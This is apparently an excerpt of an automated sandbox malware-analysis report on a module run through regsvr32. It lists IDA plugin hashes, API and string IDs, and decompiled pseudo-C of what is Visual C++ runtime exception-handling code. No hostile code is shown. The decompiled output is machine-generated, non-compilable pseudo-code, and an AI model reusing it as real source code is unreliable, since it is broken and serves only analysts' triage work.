                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileHandleWrite
                                                                                                                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                                                                                                                            • API String ID: 3320372497-2837547082
                                                                                                                                            • Opcode ID: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                                                                                            • Instruction ID: f767be395cc35e2a91b0c68142e1a179893e5276e82c346d041a59fd88b8c9d3
                                                                                                                                            • Opcode Fuzzy Hash: b64be2a8eca497eb38ff52dc13b3436bc691d1b4503f9f72973df8eece0bc5fb
                                                                                                                                            • Instruction Fuzzy Hash: B5915C32A0C69AD5EB74CF54E4543BA6360FB88B48FA00A36D68D436E9DF3DD145CB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                            • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                                                                                                            • API String ID: 2574300362-564504941
                                                                                                                                            • Opcode ID: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                                                                                            • Instruction ID: d50e682ef2294995b7b52c5c92ae61f9121767c0152e831347f4d728c4317059
                                                                                                                                            • Opcode Fuzzy Hash: fee43fc66515416ac0980d72625433c0e8db806945977869f613c1f5f8def98f
                                                                                                                                            • Instruction Fuzzy Hash: 3F51ED3590CAAAC6E768DB55F94436973A0FB85F44F600935DA8E476E4DF3CE484CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 641786319-0
                                                                                                                                            • Opcode ID: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                                                                                            • Instruction ID: 226b15e80ad3fb93a9548a446b22fe24c5a8500848ed7bdd87176988747c34f8
                                                                                                                                            • Opcode Fuzzy Hash: dd68202ae9e70015e3243afc192c87c9af493ce1bfd3ef4005d4635320cae465
                                                                                                                                            • Instruction Fuzzy Hash: 6D022832A0CA99E1D6649F15F4403AAB760FBC4B60F600A35E69D4BBE9DF7DD481CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 20%
                                                                                                                                            			E00007FFC7FFC65D040B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
                                                                                                                                            				long long _v24;
                                                                                                                                            				long long _v32;
                                                                                                                                            				char _v56;
                                                                                                                                            				long long _v64;
                                                                                                                                            				long long _v72;
                                                                                                                                            				char _v80;
                                                                                                                                            				void* _v88;
                                                                                                                                            				void* _v96;
                                                                                                                                            				intOrPtr _v104;
                                                                                                                                            				void* _v112;
                                                                                                                                            				intOrPtr _v120;
                                                                                                                                            				void* _v128;
                                                                                                                                            				char _v132;
                                                                                                                                            				char _v136;
                                                                                                                                            				long long _v144;
                                                                                                                                            				signed int _v152;
                                                                                                                                            				char _v160;
                                                                                                                                            				signed char _v164;
                                                                                                                                            				signed int _v168;
                                                                                                                                            				char _v176;
                                                                                                                                            				char _v184;
                                                                                                                                            				long long _v192;
                                                                                                                                            				signed char _v200;
                                                                                                                                            				long long _v208;
                                                                                                                                            				signed int _v216;
                                                                                                                                            				signed int _v224;
                                                                                                                                            				long long _v232;
                                                                                                                                            				void* _t222;
                                                                                                                                            				void* _t244;
                                                                                                                                            				void* _t295;
                                                                                                                                            				long long _t302;
                                                                                                                                            				long long _t303;
                                                                                                                                            				intOrPtr _t311;
                                                                                                                                            				long long _t312;
                                                                                                                                            				long long _t321;
                                                                                                                                            				intOrPtr _t325;
                                                                                                                                            				long long _t329;
                                                                                                                                            				long long _t330;
                                                                                                                                            				long long _t332;
                                                                                                                                            
                                                                                                                                            				_t295 = __rax;
                                                                                                                                            				_a32 = __r9;
                                                                                                                                            				_a24 = __r8;
                                                                                                                                            				_a16 = __rdx;
                                                                                                                                            				_a8 = __rcx;
                                                                                                                                            				_v164 = 0;
                                                                                                                                            				_v152 = 0;
                                                                                                                                            				_v168 = E00007FFC7FFC65D03B40(_a40, _a32);
                                                                                                                                            				E00007FFC7FFC65CFE500(_a16, _a32, _a40,  &_v160);
                                                                                                                                            				if (_v168 - E00007FFC7FFC65D03C70(_t295, _a16, _a32, _a40) <= 0) goto 0x65d04176;
                                                                                                                                            				r9d = _v168;
                                                                                                                                            				E00007FFC7FFC65D03BD0(_t217,  &_v160, _a32, _a40);
                                                                                                                                            				r9d = _v168;
                                                                                                                                            				E00007FFC7FFC65D03C00(_v168 - E00007FFC7FFC65D03C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
                                                                                                                                            				goto 0x65d04197;
                                                                                                                                            				_v168 = E00007FFC7FFC65D03C70(_t295, _a16, _a32, _a40);
                                                                                                                                            				if (_v168 - 0xffffffff < 0) goto 0x65d041b1;
                                                                                                                                            				if (_v168 - _a40[1] >= 0) goto 0x65d041b1;
                                                                                                                                            				goto 0x65d041b6;
                                                                                                                                            				_t222 = E00007FFC7FFC65CFCF80(_a40);
                                                                                                                                            				if ( *_a8 != 0xe06d7363) goto 0x65d04398;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0x65d04398;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0x65d04213;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0x65d04213;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0x65d04398;
                                                                                                                                            				_t302 = _a8;
                                                                                                                                            				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0x65d04398;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0x65d0423a;
                                                                                                                                            				goto 0x65d04862;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
                                                                                                                                            				_a8 = _t303;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
                                                                                                                                            				_v164 = 1;
                                                                                                                                            				E00007FFC7FFC65CFE6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
                                                                                                                                            				if (E00007FFC7FFC65D0D2C0(1, _a8) == 0) goto 0x65d04290;
                                                                                                                                            				goto 0x65d04295;
                                                                                                                                            				E00007FFC7FFC65CFCF80(_a8);
                                                                                                                                            				if ( *_a8 != 0xe06d7363) goto 0x65d042fa;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0x65d042fa;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0x65d042e6;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0x65d042e6;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0x65d042fa;
                                                                                                                                            				_t311 = _a8;
                                                                                                                                            				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0x65d042fa;
                                                                                                                                            				E00007FFC7FFC65CFCF80(_t311);
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0x65d04398;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				_t312 =  *((intOrPtr*)(_t311 + 0x108));
                                                                                                                                            				_v144 = _t312;
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				 *((long long*)(_t312 + 0x108)) = 0;
                                                                                                                                            				if ((E00007FFC7FFC65D05BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0x65d04349;
                                                                                                                                            				goto 0x65d04398;
                                                                                                                                            				if ((E00007FFC7FFC65D05CC0(_v144) & 0x000000ff) == 0) goto 0x65d04393;
                                                                                                                                            				E00007FFC7FFC65D05AB0(1, _a8);
                                                                                                                                            				E00007FFC7FFC65D04870( &_v56, "bad exception");
                                                                                                                                            				E00007FFC7FFC65D0D320(__edi, __esi, __esp,  &_v56, 0x65d1a180);
                                                                                                                                            				goto 0x65d04398;
                                                                                                                                            				E00007FFC7FFC65CFCF50(_t312);
                                                                                                                                            				if ( *_a8 != 0xe06d7363) goto 0x65d047d9;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0x65d047d9;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0x65d043f5;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0x65d043f5;
                                                                                                                                            				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0x65d047d9;
                                                                                                                                            				if (_a40[3] <= 0) goto 0x65d0466c;
                                                                                                                                            				_v216 = _a32;
                                                                                                                                            				_v224 =  &_v132;
                                                                                                                                            				_t321 =  &_v136;
                                                                                                                                            				_v232 = _t321;
                                                                                                                                            				r9d = _v168;
                                                                                                                                            				r8d = _a56;
                                                                                                                                            				E00007FFC7FFC65CFEA30(_a16, _a40);
                                                                                                                                            				_v128 = _t321;
                                                                                                                                            				goto 0x65d0447e;
                                                                                                                                            				_v136 = _v136 + 1;
                                                                                                                                            				_v128 = _v128 + 0x14;
                                                                                                                                            				if (_v136 - _v132 >= 0) goto 0x65d0466c;
                                                                                                                                            				if ( *_v128 - _v168 > 0) goto 0x65d044b3;
                                                                                                                                            				_t325 = _v128;
                                                                                                                                            				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0x65d044b5;
                                                                                                                                            				goto 0x65d0445a;
                                                                                                                                            				E00007FFC7FFC65CFE680( *((intOrPtr*)(_t325 + 4)), _t325);
                                                                                                                                            				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
                                                                                                                                            				_v120 =  *((intOrPtr*)(_v128 + 0xc));
                                                                                                                                            				_v120 = _v120 - 1;
                                                                                                                                            				_t329 = _v112 + 0x14;
                                                                                                                                            				_v112 = _t329;
                                                                                                                                            				if (_v120 <= 0) goto 0x65d04667;
                                                                                                                                            				_t244 = E00007FFC7FFC65CFE6A0(_v120 - 1, _t329);
                                                                                                                                            				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
                                                                                                                                            				_v96 = _t330;
                                                                                                                                            				E00007FFC7FFC65CFE6A0(_t244, _t330);
                                                                                                                                            				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
                                                                                                                                            				goto 0x65d0457e;
                                                                                                                                            				_v104 = _v104 - 1;
                                                                                                                                            				_t332 = _v96 + 4;
                                                                                                                                            				_v96 = _t332;
                                                                                                                                            				if (_v104 <= 0) goto 0x65d04662;
                                                                                                                                            				E00007FFC7FFC65CFE6A0(_v104 - 1, _t332);
                                                                                                                                            				_v88 = _t332 +  *_v96;
                                                                                                                                            				if (E00007FFC7FFC65D04CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0x65d045ce;
                                                                                                                                            				goto 0x65d0455a;
                                                                                                                                            				_v152 = 1;
                                                                                                                                            				_v176 = _a48 & 0x000000ff;
                                                                                                                                            				_v184 = _v164 & 0x000000ff;
                                                                                                                                            				_v192 = _a64;
                                                                                                                                            				_v200 = _a56;
                                                                                                                                            				_v208 = _v128;
                                                                                                                                            				_v216 = _v88;
                                                                                                                                            				_v224 = _v112;
                                                                                                                                            				_v232 = _a40;
                                                                                                                                            				E00007FFC7FFC65D05180(__edi, __esi, __esp, E00007FFC7FFC65D04CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
                                                                                                                                            				goto 0x65d04667;
                                                                                                                                            				goto 0x65d0455a;
                                                                                                                                            				goto L1;
                                                                                                                                            				goto 0x65d0445a;
                                                                                                                                            				__eax = _v152 & 0x000000ff;
                                                                                                                                            				__eflags = _v152 & 0x000000ff;
                                                                                                                                            				if ((_v152 & 0x000000ff) != 0) goto 0x65d047d7;
                                                                                                                                            				__rax = _a40;
                                                                                                                                            				__eax =  *_a40;
                                                                                                                                            				__eax =  *_a40 & 0x1fffffff;
                                                                                                                                            				__eflags = __eax - 0x19930521;
                                                                                                                                            				if (__eax - 0x19930521 < 0) goto 0x65d047d7;
                                                                                                                                            				__rax = _a40;
                                                                                                                                            				__eflags =  *(__rax + 0x20);
                                                                                                                                            				if ( *(__rax + 0x20) == 0) goto 0x65d046bf;
                                                                                                                                            				__eax = E00007FFC7FFC65CFE680(__eax, __rax);
                                                                                                                                            				_a40 = _a40[8];
                                                                                                                                            				_v32 = __rax;
                                                                                                                                            				goto 0x65d046cb;
                                                                                                                                            				_v32 = 0;
                                                                                                                                            				__eflags = _v32;
                                                                                                                                            				if (_v32 == 0) goto 0x65d047d7;
                                                                                                                                            				__rax = _a40;
                                                                                                                                            				__eflags =  *(__rax + 0x20);
                                                                                                                                            				if ( *(__rax + 0x20) == 0) goto 0x65d04706;
                                                                                                                                            				__eax = E00007FFC7FFC65CFE680(__eax, __rax);
                                                                                                                                            				_a40 = _a40[8];
                                                                                                                                            				__rax = __rax + _a40[8];
                                                                                                                                            				_v24 = __rax;
                                                                                                                                            				goto 0x65d04712;
                                                                                                                                            				_v24 = 0;
                                                                                                                                            				__rdx = _v24;
                                                                                                                                            				__rcx = _a8;
                                                                                                                                            				E00007FFC7FFC65D05BB0(__rax, _a8, _v24) = __al & 0x000000ff;
                                                                                                                                            				__eflags = __al & 0x000000ff;
                                                                                                                                            				if ((__al & 0x000000ff) != 0) goto 0x65d047d7;
                                                                                                                                            				__rax = _a16;
                                                                                                                                            				_v64 = _a16;
                                                                                                                                            				__r9 =  &_v80;
                                                                                                                                            				__r8 = _a40;
                                                                                                                                            				__rdx = _a32;
                                                                                                                                            				__rcx = _a16;
                                                                                                                                            				__eax = E00007FFC7FFC65CFE500(_a16, _a32, _a40,  &_v80);
                                                                                                                                            				_v64 = __rax;
                                                                                                                                            				_v72 = 0;
                                                                                                                                            				__eax = _a48 & 0x000000ff;
                                                                                                                                            				_v200 = __al;
                                                                                                                                            				__rax = _a32;
                                                                                                                                            				_v208 = _a32;
                                                                                                                                            				__rax = _a40;
                                                                                                                                            				_v216 = _a40;
                                                                                                                                            				_v224 = 0xffffffff;
                                                                                                                                            				_v232 = 0;
                                                                                                                                            				__r9 = _v64;
                                                                                                                                            				__r8 = _a24;
                                                                                                                                            				__rdx = _a8;
                                                                                                                                            				__rcx = _a16;
                                                                                                                                            				__eax = E00007FFC7FFC65CFEDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
                                                                                                                                            				goto 0x65d0484c;
                                                                                                                                            				__rax = _a40;
                                                                                                                                            				__eflags =  *(__rax + 0xc);
                                                                                                                                            				if ( *(__rax + 0xc) <= 0) goto 0x65d0484c;
                                                                                                                                            				__eax = _a48 & 0x000000ff;
                                                                                                                                            				__eflags = _a48 & 0x000000ff;
                                                                                                                                            				if ((_a48 & 0x000000ff) != 0) goto 0x65d04847;
                                                                                                                                            				__rax = _a64;
                                                                                                                                            				_v208 = _a64;
                                                                                                                                            				__eax = _a56;
                                                                                                                                            				_v216 = _a56;
                                                                                                                                            				__eax = _v168;
                                                                                                                                            				_v224 = _v168;
                                                                                                                                            				__rax = _a40;
                                                                                                                                            				_v232 = _a40;
                                                                                                                                            				__r9 = _a32;
                                                                                                                                            				__r8 = _a24;
                                                                                                                                            				__rdx = _a16;
                                                                                                                                            				__rcx = _a8;
                                                                                                                                            				__eax = E00007FFC7FFC65D04960(__ecx, _a8, _a16, _a24, _a32);
                                                                                                                                            				goto 0x65d0484c;
                                                                                                                                            				__eax = E00007FFC7FFC65CFCF50(__rax);
                                                                                                                                            				0x65cf4000();
                                                                                                                                            				__eflags =  *((long long*)(__rax + 0x108));
                                                                                                                                            				if ( *((long long*)(__rax + 0x108)) != 0) goto 0x65d0485d;
                                                                                                                                            				goto 0x65d04862;
                                                                                                                                            				return E00007FFC7FFC65CFCF80(__rax);
                                                                                                                                            			}










































                                                                                                                                            0x7ffc65d040b0
                                                                                                                                            0x7ffc65d040b0
                                                                                                                                            0x7ffc65d040b5
                                                                                                                                            0x7ffc65d040ba
                                                                                                                                            0x7ffc65d040bf
                                                                                                                                            0x7ffc65d040cb
                                                                                                                                            0x7ffc65d040d0
                                                                                                                                            0x7ffc65d040ea
                                                                                                                                            0x7ffc65d0410b
                                                                                                                                            0x7ffc65d04131
                                                                                                                                            0x7ffc65d04133
                                                                                                                                            0x7ffc65d0414d
                                                                                                                                            0x7ffc65d04152
                                                                                                                                            0x7ffc65d0416f
                                                                                                                                            0x7ffc65d04174
                                                                                                                                            0x7ffc65d04193
                                                                                                                                            0x7ffc65d0419c
                                                                                                                                            0x7ffc65d041ad
                                                                                                                                            0x7ffc65d041af
                                                                                                                                            0x7ffc65d041b1
                                                                                                                                            0x7ffc65d041c4
                                                                                                                                            0x7ffc65d041d6
                                                                                                                                            0x7ffc65d041eb
                                                                                                                                            0x7ffc65d041fc
                                                                                                                                            0x7ffc65d0420d
                                                                                                                                            0x7ffc65d04213
                                                                                                                                            0x7ffc65d04220
                                                                                                                                            0x7ffc65d04226
                                                                                                                                            0x7ffc65d04233
                                                                                                                                            0x7ffc65d04235
                                                                                                                                            0x7ffc65d0423a
                                                                                                                                            0x7ffc65d0423f
                                                                                                                                            0x7ffc65d04246
                                                                                                                                            0x7ffc65d0424e
                                                                                                                                            0x7ffc65d0425a
                                                                                                                                            0x7ffc65d04262
                                                                                                                                            0x7ffc65d04273
                                                                                                                                            0x7ffc65d0428c
                                                                                                                                            0x7ffc65d0428e
                                                                                                                                            0x7ffc65d04290
                                                                                                                                            0x7ffc65d042a3
                                                                                                                                            0x7ffc65d042b1
                                                                                                                                            0x7ffc65d042c2
                                                                                                                                            0x7ffc65d042d3
                                                                                                                                            0x7ffc65d042e4
                                                                                                                                            0x7ffc65d042e6
                                                                                                                                            0x7ffc65d042f3
                                                                                                                                            0x7ffc65d042f5
                                                                                                                                            0x7ffc65d042fa
                                                                                                                                            0x7ffc65d04307
                                                                                                                                            0x7ffc65d0430d
                                                                                                                                            0x7ffc65d04312
                                                                                                                                            0x7ffc65d04319
                                                                                                                                            0x7ffc65d0431e
                                                                                                                                            0x7ffc65d04323
                                                                                                                                            0x7ffc65d04345
                                                                                                                                            0x7ffc65d04347
                                                                                                                                            0x7ffc65d04358
                                                                                                                                            0x7ffc65d04364
                                                                                                                                            0x7ffc65d04378
                                                                                                                                            0x7ffc65d0438c
                                                                                                                                            0x7ffc65d04391
                                                                                                                                            0x7ffc65d04393
                                                                                                                                            0x7ffc65d043a6
                                                                                                                                            0x7ffc65d043b8
                                                                                                                                            0x7ffc65d043cd
                                                                                                                                            0x7ffc65d043de
                                                                                                                                            0x7ffc65d043ef
                                                                                                                                            0x7ffc65d04401
                                                                                                                                            0x7ffc65d0440f
                                                                                                                                            0x7ffc65d0441c
                                                                                                                                            0x7ffc65d04421
                                                                                                                                            0x7ffc65d04429
                                                                                                                                            0x7ffc65d0442e
                                                                                                                                            0x7ffc65d04433
                                                                                                                                            0x7ffc65d0444b
                                                                                                                                            0x7ffc65d04450
                                                                                                                                            0x7ffc65d04458
                                                                                                                                            0x7ffc65d04463
                                                                                                                                            0x7ffc65d04476
                                                                                                                                            0x7ffc65d0448c
                                                                                                                                            0x7ffc65d044a0
                                                                                                                                            0x7ffc65d044a2
                                                                                                                                            0x7ffc65d044b1
                                                                                                                                            0x7ffc65d044b3
                                                                                                                                            0x7ffc65d044b5
                                                                                                                                            0x7ffc65d044c9
                                                                                                                                            0x7ffc65d044dc
                                                                                                                                            0x7ffc65d044ee
                                                                                                                                            0x7ffc65d044fd
                                                                                                                                            0x7ffc65d04501
                                                                                                                                            0x7ffc65d04511
                                                                                                                                            0x7ffc65d04517
                                                                                                                                            0x7ffc65d0452c
                                                                                                                                            0x7ffc65d04531
                                                                                                                                            0x7ffc65d04539
                                                                                                                                            0x7ffc65d04551
                                                                                                                                            0x7ffc65d04558
                                                                                                                                            0x7ffc65d04563
                                                                                                                                            0x7ffc65d04572
                                                                                                                                            0x7ffc65d04576
                                                                                                                                            0x7ffc65d04586
                                                                                                                                            0x7ffc65d0458c
                                                                                                                                            0x7ffc65d0459f
                                                                                                                                            0x7ffc65d045ca
                                                                                                                                            0x7ffc65d045cc
                                                                                                                                            0x7ffc65d045ce
                                                                                                                                            0x7ffc65d045db
                                                                                                                                            0x7ffc65d045e4
                                                                                                                                            0x7ffc65d045f0
                                                                                                                                            0x7ffc65d045fc
                                                                                                                                            0x7ffc65d04608
                                                                                                                                            0x7ffc65d04615
                                                                                                                                            0x7ffc65d04622
                                                                                                                                            0x7ffc65d0462f
                                                                                                                                            0x7ffc65d04654
                                                                                                                                            0x7ffc65d0465b
                                                                                                                                            0x7ffc65d0465d
                                                                                                                                            0x7ffc65d04662
                                                                                                                                            0x7ffc65d04667
                                                                                                                                            0x7ffc65d0466c
                                                                                                                                            0x7ffc65d04671
                                                                                                                                            0x7ffc65d04673
                                                                                                                                            0x7ffc65d04679
                                                                                                                                            0x7ffc65d04681
                                                                                                                                            0x7ffc65d04683
                                                                                                                                            0x7ffc65d04688
                                                                                                                                            0x7ffc65d0468d
                                                                                                                                            0x7ffc65d04693
                                                                                                                                            0x7ffc65d0469b
                                                                                                                                            0x7ffc65d0469f
                                                                                                                                            0x7ffc65d046a1
                                                                                                                                            0x7ffc65d046ae
                                                                                                                                            0x7ffc65d046b5
                                                                                                                                            0x7ffc65d046bd
                                                                                                                                            0x7ffc65d046bf
                                                                                                                                            0x7ffc65d046cb
                                                                                                                                            0x7ffc65d046d4
                                                                                                                                            0x7ffc65d046da
                                                                                                                                            0x7ffc65d046e2
                                                                                                                                            0x7ffc65d046e6
                                                                                                                                            0x7ffc65d046e8
                                                                                                                                            0x7ffc65d046f5
                                                                                                                                            0x7ffc65d046f9
                                                                                                                                            0x7ffc65d046fc
                                                                                                                                            0x7ffc65d04704
                                                                                                                                            0x7ffc65d04706
                                                                                                                                            0x7ffc65d04712
                                                                                                                                            0x7ffc65d0471a
                                                                                                                                            0x7ffc65d04727
                                                                                                                                            0x7ffc65d0472a
                                                                                                                                            0x7ffc65d0472c
                                                                                                                                            0x7ffc65d04732
                                                                                                                                            0x7ffc65d0473a
                                                                                                                                            0x7ffc65d04742
                                                                                                                                            0x7ffc65d0474a
                                                                                                                                            0x7ffc65d04752
                                                                                                                                            0x7ffc65d0475a
                                                                                                                                            0x7ffc65d04762
                                                                                                                                            0x7ffc65d04767
                                                                                                                                            0x7ffc65d0476f
                                                                                                                                            0x7ffc65d0477b
                                                                                                                                            0x7ffc65d04783
                                                                                                                                            0x7ffc65d04787
                                                                                                                                            0x7ffc65d0478f
                                                                                                                                            0x7ffc65d04794
                                                                                                                                            0x7ffc65d0479c
                                                                                                                                            0x7ffc65d047a1
                                                                                                                                            0x7ffc65d047a9
                                                                                                                                            0x7ffc65d047b2
                                                                                                                                            0x7ffc65d047ba
                                                                                                                                            0x7ffc65d047c2
                                                                                                                                            0x7ffc65d047ca
                                                                                                                                            0x7ffc65d047d2
                                                                                                                                            0x7ffc65d047d7
                                                                                                                                            0x7ffc65d047d9
                                                                                                                                            0x7ffc65d047e1
                                                                                                                                            0x7ffc65d047e5
                                                                                                                                            0x7ffc65d047e7
                                                                                                                                            0x7ffc65d047ef
                                                                                                                                            0x7ffc65d047f1
                                                                                                                                            0x7ffc65d047f3
                                                                                                                                            0x7ffc65d047fb
                                                                                                                                            0x7ffc65d04800
                                                                                                                                            0x7ffc65d04807
                                                                                                                                            0x7ffc65d0480b
                                                                                                                                            0x7ffc65d0480f
                                                                                                                                            0x7ffc65d04813
                                                                                                                                            0x7ffc65d0481b
                                                                                                                                            0x7ffc65d04820
                                                                                                                                            0x7ffc65d04828
                                                                                                                                            0x7ffc65d04830
                                                                                                                                            0x7ffc65d04838
                                                                                                                                            0x7ffc65d04840
                                                                                                                                            0x7ffc65d04845
                                                                                                                                            0x7ffc65d04847
                                                                                                                                            0x7ffc65d0484c
                                                                                                                                            0x7ffc65d04851
                                                                                                                                            0x7ffc65d04859
                                                                                                                                            0x7ffc65d0485b
                                                                                                                                            0x7ffc65d04869

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                                                                                                                            • String ID: bad exception$csm$csm$csm
                                                                                                                                            • API String ID: 3498492519-820278400
                                                                                                                                            • Opcode ID: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                                                                                            • Instruction ID: 5be7f62114d64798b3c5138ed7767203d832985aac9afb7f631ca718ec572d5a
                                                                                                                                            • Opcode Fuzzy Hash: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                                                                                                            • Instruction Fuzzy Hash: F912F236A0CAD9C5DAB49F15E1807EAB7A0FB98B40F604936DACD47B99DF38D440CB50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
